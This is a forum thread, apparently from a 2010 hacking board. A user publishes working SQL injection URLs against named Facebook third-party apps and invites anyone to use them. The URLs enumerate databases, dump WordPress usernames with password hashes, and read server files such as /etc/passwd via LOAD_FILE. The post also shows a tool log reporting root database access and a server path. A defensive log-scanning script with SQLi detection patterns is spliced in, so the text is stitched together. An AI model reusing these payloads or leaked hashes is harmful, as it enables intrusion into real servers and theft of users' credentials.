
Facebook Server SQL Injection

19-09-2010 18:09 | #1
Joined: 06/2010 | Posts: 40 | Thanks given: 0 | Thanks received: 20 | Topics: 16 | Trade: (0) %
Hello, my commanders and my subordinates. I can't quite remember, but a few days ago in some thread I said that I could hack Facebook if I wanted to. I didn't hack it, but I found the SQL holes; I'm publishing them now and giving permission to anyone who wants to do it.


;===== BASIC INFO
http://apps.facebook.com/politicalaction/issue.php?issueid=1+and+1=2+UNION+SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),3,4--+1

;===== LIST TABLES
http://apps.facebook.com/politicalaction/issue.php?issueid=1+and+1=2+UNION+SELECT+1,2,3,4,concat(table_schema,0x3a,table_name),6,7,8,9,10+FROM+information_schema.tables+WHERE+table_schema+!=+0x6d7973716c+AND+table_schema+!=+0x696e666f726d6174696f6e5f736368656d61--+1

;===== LIST COLUMNS
http://apps.facebook.com/politicalaction/issue.php?issueid=1+and+1=2+UNION+SELECT+1,2,3,4,concat(table_schema,0x3a,table_name,0x3a,column_name),6,7,8,9,10+FROM+information_schema.columns+WHERE+table_schema+!=+0x6d7973716c+AND+table_schema+!=+0x696e666f726d6174696f6e5f736368656d61--+1

;===== LIST WORDPRESS USERS/PASS
http://apps.facebook.com/politicalaction/issue.php?issueid=1+and+1=2+UNION+SELECT+1,2,3,4,concat(user_login,0x3a,user_pass),6,7,8,9,10+from+candukincaid.wp_users--+1

admin:$P$BQFUeKJK810OT9Y/Hmcx/hZdaRBEmw/
lucia:$P$BqEFbcc1.uPFB8SfIIDcmVq7pc40WK.
tom:$P$BlBjwW.57R/lHuoGLSUyAutopYdoEt/

-----

http://apps.facebook.com/politicalaction/issue.php?issueid=1+and+1=2+UNION+SELECT+1,2,3,4,concat(user_login,0x3a,user_pass),6,7,8,9,10+from+churchwpdb.wp_users--+1

admin:$P$B6RRs18hNYnYWPgNy0brmY/qPg3W7b.
test:$P$BuuuSp.VN0Ha5/p11u20ATdWqeEk

-----

http://apps.facebook.com/politicalaction/issue.php?issueid=1+and+1=2+UNION+SELECT+1,2,3,4,concat(user_login,0x3a,user_pass),6,7,8,9,10+from+luciacanduwp.wp_users--

admin:$P$B1jGLGuDkN6gNT68q92h3RG3wG4qwi/
lucia:$P$BBtUst3KjOqCdTNVVTGdWlgayz

################
# INFORMATIONS #
################
;===== PATH
/home/tomkincaid/tomkincaid.dreamhosters.com/facebookclient/shared_lib.php

;===== BASIC INFO
tomkincaid@ps5008.dreamhost.com
politicsapp
5.0.45-log

;===== TABLES

# astro
** app
** oscache
** user


# candukincaid
** wp_commentmeta
** wp_comments
** wp_links
** wp_options
** wp_postmeta
** wp_posts
** wp_px_albumPhotos
** wp_px_albums
** wp_px_galleries
** wp_px_photos
** wp_px_plugins
** wp_term_relationships
** wp_term_taxonomy
** wp_terms
** wp_usermeta
** wp_users

# cemeteries
** AmazonItem
** AmazonType
** CameraType
** Format
** Guestbook
** Links
** Photo
** Scan

# churchwpdb
** wp_comments
** eventscalendar_main
** icl_languages
** icl_languages_translations
** icl_locale_map
** icl_translations
** links
** options
** postmeta
** posts
** term_relationships
** term_taxonomy
** terms
** usermeta
** users

# countdownapp
** oscache
** user

# crush
** couple
** oscache
** user

# dare
** flag
** game
** item
** user

# friendiq
** oscache
** score
** user

# giants
** app
** league
** media
** mediaforuser
** oscache
** post
** team
** topic
** user

# hookup
** couple
** neverblue
** oscache
** user

# jauntlet
** user

# loccus
** checkin
** oscache
** user

# luciacanduwp
** wp_comments
** wp_links
** wp_options
** wp_postmeta
** wp_posts
** wp_term_relationships
** wp_term_taxonomy
** wp_terms
** wp_usermeta
** wp_users

# maps
** place
** user

# martisor
** user

# mediax
** oscache
** user

# mostlikely
** callback
** statement
** statementforuser
** user

# music
** itemforuser
** oscache
** user

# pimpfriends
** activity
** ad
** favorite
** gift
** giftforho
** hoforpimp
** johnforho
** oscache
** permission
** photoforuser
** room
** user
** wall
** whistle

# plans
** attend
** cache
** event
** place
** user

# politicsapp
** app
** badge
** badgeforuser
** issue
** oscache
** position
** positionforuser
** post
** user

# postergifts
** category
** categoryproduct
** categoryrelationship
** image
** oscache
** posterforuser
** user

# posters2
** category
** categoryproduct
** categoryrelationship
** image
** oscache
** posterforuser
** user

# projectbasecamp
** clicktimeproject
** clicktimereport
** clicktimetask
** idcorrelation
** projectbudget
** taskforuser
** user

# pwnfriends
** photo
** photoforfriend
** photoforuser
** user

# quiz
** app
** question
** quiz
** result
** resultforquestion
** resultforuser
** user

# seeall
** network
** networkforuser
** test2
** userpref

# send
** app
** item
** itemforuser
** neverblue
** user

# supporter
** oscache
** user

# swapu
** item
** itemforuser
** network
** networkforuser
** swaptype
** user

# tomsapps
** ad
** adclick
** app
** contest
** notification

# travelbug
** bug
** bugcache
** user

# tv
** app
** oscache
** post
** series
** seriesforuser
** thread
** threadforuser
** user

# wikitravel
** badmap
** wikitravelimage
** wikitravelpage


---------------------------------------------------------------------------------------------------------------------------------------------------

load_file = yes
magic_quotes = off

  • Gathering MySQL Server Configuration...
Database: facebook
User: root@localhost
Version: 5.1.37-1ubuntu5.4

  • Do we have Access to MySQL Database: YES <-- w00t w00t
  • Dumping MySQL user info. user:password:host
  • Number of users in the mysql.user table: 4
    [0] root::localhost
    [1] root::ip-10-128-57-239
    [2] root::127.0.0.1
    [3] debian-sys-maint:*79E5005DD3B60F9100ACF7571D5DC9079388F408:localhost

  • Do we have Access to Load_File: YES <-- w00t w00t
  • Starting Load_File Fuzzer...
  • Number of tables names to be fuzzed: 236
    [!] Found /etc/passwd
    [!] http://apps.facebook.com/myhotdeals/promo.php?promoid=150+AND+1=2+UnIoN+aLL+SeLeCt+1,2,3,4,5,LOAD_FILE('/etc/passwd'),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30--
    [!] Found /etc/hosts
    [!] http://apps.facebook.com/myhotdeals/promo.php?promoid=150+AND+1=2+UnIoN+aLL+SeLeCt+1,2,3,4,5,LOAD_FILE('/etc/hosts'),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30--
    [!] Found /etc/mysql/my.cnf
    [!] http://apps.facebook.com/myhotdeals/promo.php?promoid=150+AND+1=2+UnIoN+aLL+SeLeCt+1,2,3,4,5,LOAD_FILE('/etc/mysql/my.cnf'),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30--
    [!] Found /etc/group
    [!] http://apps.facebook.com/myhotdeals/promo.php?promoid=150+AND+1=2+UnIoN+aLL+SeLeCt+1,2,3,4,5,LOAD_FILE('/etc/group'),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30--
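
Seen from the defending side, requests like the ones in this post leave a characteristic trail in the web server's access log: a parameter that should only ever hold an integer id suddenly carries `UNION SELECT`, an `information_schema` lookup, a `user()`/`version()` fingerprint or a `LOAD_FILE(`. The Python script below is an added example, not code from the post, from the forum, or from any of the applications named above. It parses Common Log Format lines, URL-decodes each query parameter (so `+` and `%27` become what the database engine actually received) and reports which payload family fired. The log lines are constructed for the example, the client addresses are from the documentation IP ranges, and `INT_PARAMS` is an assumption taken from the parameter names in the post's URLs (`issueid`, `promoid`) that those ids are meant to be integers.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Common Log Format: client ident user [time] "METHOD target HTTP/x" status bytes
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Signatures for the payload families shown in the post. They run against the
# URL-decoded, whitespace-collapsed parameter value, case-insensitively, so a
# mixed-case variant such as "UnIoN aLL SeLeCt" is caught as well.
SIGNATURES = {
    "union_select": re.compile(r"\bunion\b(?:\s+all)?\s+select\b", re.I),
    "schema_enum": re.compile(r"\binformation_schema\s*\.\s*(?:tables|columns)\b", re.I),
    "file_read": re.compile(r"\bload_file\s*\(", re.I),
    "fingerprint": re.compile(r"\b(?:user|database|version)\s*\(\s*\)", re.I),
    "comment_tail": re.compile(r"--(?:\s|$)"),
}

# Assumption: these parameters are integer ids (names taken from the post's
# URLs). Anything but digits in them is a validation failure on its own,
# independent of any signature.
INT_PARAMS = {"issueid", "promoid"}


def decoded_params(target):
    """Split a request target into its path and decoded (name, value) pairs.
    parse_qsl turns '+' into spaces and resolves %xx escapes, so the values
    read the way the database engine would have received them."""
    parts = urlsplit(target)
    return parts.path, parse_qsl(parts.query, keep_blank_values=True)


def classify_value(name, value):
    """Return the set of signature names that fire on one parameter value."""
    text = " ".join(value.split())  # collapse any run of whitespace
    hits = {sig for sig, rx in SIGNATURES.items() if rx.search(text)}
    if name.lower() in INT_PARAMS and not text.isdigit():
        hits.add("non_numeric_id")
    return hits


def scan_line(line):
    """Parse one access-log line; return a finding dict, or None if clean."""
    m = LOG_RE.match(line)
    if not m:
        return None  # not a CLF line, nothing to judge
    path, params = decoded_params(m.group("target"))
    findings = {}
    for name, value in params:
        hits = classify_value(name, value)
        if hits:
            findings[name] = sorted(hits)
    if not findings:
        return None
    return {"ip": m.group("ip"), "path": path,
            "status": m.group("status"), "params": findings}


def scan(lines):
    """Scan an iterable of log lines and return every finding, in order."""
    return [f for f in map(scan_line, lines) if f]


# Constructed sample log (documentation IP ranges, invented timestamps and
# sizes); only the payload shapes mirror the ones quoted in the post.
SAMPLE_LOG = [
    '203.0.113.7 - - [19/Sep/2010:18:01:12 +0300] "GET /politicalaction/issue.php?issueid=42 HTTP/1.1" 200 5120',
    '203.0.113.7 - - [19/Sep/2010:18:03:40 +0300] "GET /politicalaction/issue.php?issueid=1+and+1=2+UNION+SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),3,4--+1 HTTP/1.1" 200 5207',
    '203.0.113.7 - - [19/Sep/2010:18:05:02 +0300] "GET /politicalaction/issue.php?issueid=1+and+1=2+UNION+SELECT+1,2,3,4,concat(table_schema,0x3a,table_name),6,7,8,9,10+FROM+information_schema.tables+WHERE+table_schema+!=+0x6d7973716c--+1 HTTP/1.1" 200 9841',
    '198.51.100.23 - - [19/Sep/2010:18:07:55 +0300] "GET /myhotdeals/promo.php?promoid=150+AND+1=2+UnIoN+aLL+SeLeCt+1,2,3,4,5,LOAD_FILE(%27/etc/passwd%27),7,8-- HTTP/1.1" 200 7310',
    'garbage line that does not parse',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding["ip"], finding["path"], finding["params"])
```

The `non_numeric_id` check is worth singling out: it is the same rule that, enforced server-side (casting the id to an integer, or binding it as a parameter of a prepared statement), would have closed every URL in this post, whereas the signature matches only tell you afterwards that someone tried. Run on a real log, the script takes the lines from `sys.stdin` or a file in place of `SAMPLE_LOG`; the 200 status on the flagged lines is the detail to look at first, since it means the injected `UNION` was executed rather than rejected.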

19-09-2010 20:59 | #2
Joined: 05/2010 | From: FF | Posts: 1.861 | Thanks given: 102 | Thanks received: 463 | Topics: 572 | Trade: (0) %
Thanks for sharing, my second lieutenant..!
ReLaXKinG thanked.
19-09-2010 21:02 | #3
ar£S | Member
Joined: 07/2009 | Posts: 5.666 | Thanks given: 234 | Thanks received: 662 | Topics: 3397 | Trade: (0) %
Uh-huh, yeah sure, report it //
set_maq thanked.
19-09-2010 21:06 | #4
Joined: 05/2010 | From: FF | Posts: 1.861 | Thanks given: 102 | Thanks received: 463 | Topics: 572 | Trade: (0) %
Quote:
Originally posted by ar£S
Uh-huh, yeah sure, report it //

Zuhahahaha xDxDxD
ReLaXKinG, CaSFeRs thanked.
